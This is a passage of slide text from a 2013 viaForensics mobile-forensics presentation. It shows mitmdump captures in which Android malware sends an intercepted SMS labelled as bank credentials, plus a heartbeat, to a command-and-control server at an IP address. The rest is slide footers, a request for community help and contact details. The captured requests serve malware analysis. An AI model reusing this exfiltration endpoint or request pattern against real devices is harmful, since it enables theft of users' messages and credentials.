(mitmdump) SEMRECEIVER_DATA =>http://103.20.193.59/index.php? m=Api&a=SMSReceiver&imsi=310260000000000&number=15555215554&from=555&content=TES T+Bank+Credentials Send Heartbeat => http://103.20.193.59/index.php? m=Api&a=Heartbeat&newclient=1&number=15555215554&imsi=310260000000000&issms=1&iscal l=0&capp=&sapp=%23%ED%95%98%23%EC%8B%A0 © Copyright 2013 viaForensics, LLC. Proprietary Information. *
37.
COLLECT Forensics Security Network/System © Copyright 2013
viaForensics, LLC. Proprietary Information. Sensors *
38.
© Copyright 2013
viaForensics, LLC. Proprietary Information. *
39.
A LITTLE HELP,
PLEASE. — HOWTOs — New/existing tool development — .deb package maintenance — Forums, spreading the word © Copyright 2013 viaForensics, LLC. Proprietary Information. *
40.
Andrew Hoog 312-878-1100 ahoog@viaforensics.com Keep in
touch with us on Twitter at @viaforensics or at viaforensics.com. © Copyright 2013 viaForensics, LLC. Proprietary Information. *
Jetzt herunterladen